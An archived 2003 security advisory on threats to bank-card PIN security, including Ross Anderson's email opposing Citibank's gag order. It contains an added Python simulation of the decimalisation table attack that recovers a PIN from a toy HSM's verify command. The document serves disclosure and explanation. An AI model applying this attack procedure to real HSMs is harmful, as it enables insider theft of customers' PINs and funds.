21st Feb 2003 [SBWID-6006]
COMMAND
	Credit Cards security at risk
SYSTEMS AFFECTED
	n/a
PROBLEM
	 Editor's note
	 =============
	It has been public knowledge for quite some time that the security  of
	banking cards is at risk. To summarize:
	-> a French researcher broke (and was convicted for it) the  public-key
	scheme bundled with some of those cards, producing counterfeits  known
	as "Yes cards";
	-> thieves have repeatedly stolen valid credit card numbers and account
	holder details from online shops, most recently in an attack in  which
	a few million accounts were taken from a major card-processing service;
	-> and now the whitepapers below show that motivated  insiders  could
	easily build a scheme to steal millions in cash:
	 http://cryptome.org/pacc.htm
	 http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf
	 http://research.microsoft.com/~aherbert/volume63.pdf 
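	The attack class these reports describe is the decimalisation table
	attack: the PIN verification command of an IBM 3624-style HSM lets the
	caller supply the table that turns encrypted account data into PIN
	digits, and an insider with command access can feed it crafted tables to
	read the PIN off in a handful of queries. The following is an added
	illustration written for this note, not code from UCAM-CL-TR-560 or from
	any HSM vendor: the HSM model, key, account number and offset are all
	constructed, and SHA-256 stands in for the DES step of the real scheme,
	since the attack only needs the natural PIN to be a keyed function of
	the account number.

```python
"""Decimalisation table attack on a simulated IBM 3624-style PIN verify command.

Added illustration; not code from UCAM-CL-TR-560 or any HSM product. The HSM
model, key, account number and offset are constructed. SHA-256 replaces the
DES encryption of the real 3624 scheme because the attack does not depend on
the cipher, only on the caller controlling the decimalisation table.
"""
import hashlib
import itertools
from typing import List

# The bank's normal table: hex digit 0..f of the encrypted account -> PIN digit.
STANDARD_DECTAB = "0123456789012345"


class ToyHsm:
    """Minimal model of the PIN verification command. Only the key is secret."""

    def __init__(self, pin_key: bytes) -> None:
        self._key = pin_key
        self.calls = 0  # verify commands issued, to compare against brute force

    def _natural_pin(self, account: str, dectab: str) -> str:
        # 3624 step: encrypt the account data under the PIN key, take the first
        # four hex digits, decimalise each through the table the caller supplied.
        digest = hashlib.sha256(self._key + account.encode()).hexdigest()
        return "".join(dectab[int(h, 16)] for h in digest[:4])

    def verify_pin(self, account: str, dectab: str, offset: str, trial: str) -> bool:
        """Offset method: customer PIN = natural PIN + offset, digit-wise mod 10.

        The weakness: dectab is an unauthenticated caller-supplied parameter,
        so anyone with command access can substitute a table of their choosing.
        """
        self.calls += 1
        natural = self._natural_pin(account, dectab)
        expected = "".join(str((int(n) + int(o)) % 10) for n, o in zip(natural, offset))
        return expected == trial


def attack_table(digit: int) -> str:
    """Table mapping every hex value to 0, except those the bank maps to `digit` -> 1."""
    return "".join("1" if STANDARD_DECTAB[h] == str(digit) else "0" for h in range(16))


def recover_natural_pin(hsm: ToyHsm, account: str) -> str:
    """Recover the natural PIN (under the bank's real table) using only verify calls."""
    # Phase 1: which decimal digits occur? Under attack_table(d) the natural PIN
    # is 0000 exactly when d is absent, so trial 0000 with offset 0000 verifies
    # iff d does not occur. At most 10 calls.
    present = [d for d in range(10)
               if not hsm.verify_pin(account, attack_table(d), "0000", "0000")]

    # Phase 2: where does each present digit sit? Under attack_table(d) the
    # natural PIN has a 1 exactly at the positions holding d, so a trial with
    # 1s at a guessed set of positions verifies iff the guess is exactly right.
    pin: List[str] = ["?"] * 4
    for d in present:
        unknown = [i for i in range(4) if pin[i] == "?"]
        if d == present[-1]:
            for i in unknown:          # whatever is left must be the last digit
                pin[i] = str(d)
            break
        found = False
        for size in range(1, len(unknown) + 1):
            for positions in itertools.combinations(unknown, size):
                trial = "".join("1" if i in positions else "0" for i in range(4))
                if hsm.verify_pin(account, attack_table(d), "0000", trial):
                    for i in positions:
                        pin[i] = str(d)
                    found = True
                    break
            if found:
                break
    return "".join(pin)


def customer_pin(natural: str, offset: str) -> str:
    """PIN the customer types; the offset is stored with the account and is not secret."""
    return "".join(str((int(n) + int(o)) % 10) for n, o in zip(natural, offset))


def demo() -> dict:
    hsm = ToyHsm(pin_key=b"constructed-16-byte-key!")  # constructed secret
    account, offset = "4000123412341234", "1234"       # constructed, both non-secret
    natural = recover_natural_pin(hsm, account)
    pin = customer_pin(natural, offset)
    return {"natural_pin": natural, "customer_pin": pin, "hsm_calls": hsm.calls,
            "accepted": hsm.verify_pin(account, STANDARD_DECTAB, offset, pin)}


if __name__ == "__main__":
    print(demo())
```

	In this simplified version the natural PIN falls out in well under 40
	verify calls, against 10,000 for guessing the PIN directly, and because
	the offset is stored alongside the account rather than kept secret,
	knowing the natural PIN is knowing the customer's PIN. The defence is
	for the HSM to accept only tables it has authenticated (fixed in the
	device or bound to the PIN key) rather than any table the caller
	presents.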
	Ross Anderson points out that, in response, a bank is trying to get  an
	order in the High Court today gagging public  disclosure  of  crypto
	vulnerabilities:
	
	To: [email protected]
	Subject: Citibank tries to gag crypto bug disclosure
	Date: Thu, 20 Feb 2003 09:57:34 +0000
	From: Ross Anderson <[email protected]>
	Citibank is trying to get an order in the High Court today gagging public 
	disclosure of crypto vulnerabilities:
	  http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_gag.pdf
	I have written to the judge opposing the order:
	  http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_response.pdf
	The background is that my student Mike Bond has discovered some really 
	horrendous vulnerabilities in the cryptographic equipment commonly used 
	to protect the PINs used to identify customers to cash machines:
	  http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf
	These vulnerabilities mean that bank insiders can almost trivially find 
	out the PINs of any or all customers. The discoveries happened while Mike 
	and I were working as expert witnesses on a `phantom withdrawal' case.
	The vulnerabilities are also scientifically interesting:
	  http://cryptome.org/pacc.htm
	For the last couple of years or so there has been a rising tide of phantoms.
	I get emails with increasing frequency from people all over the world whose 
	banks have debited them for ATM withdrawals that they deny making. Banks in
	many countries simply claim that their systems are secure and so the 
	customers must be responsible. It now looks like some of these 
	vulnerabilities have also been discovered by the bad guys. Our courts and 
	regulators should make the banks fix their systems, rather than just lying 
	about security and dumping the costs on the customers.
	Curiously enough, Citi was also the bank in the case that set US law on 
	phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope that's 
	an omen, if not a precedent ...
	
SOLUTION
	n/a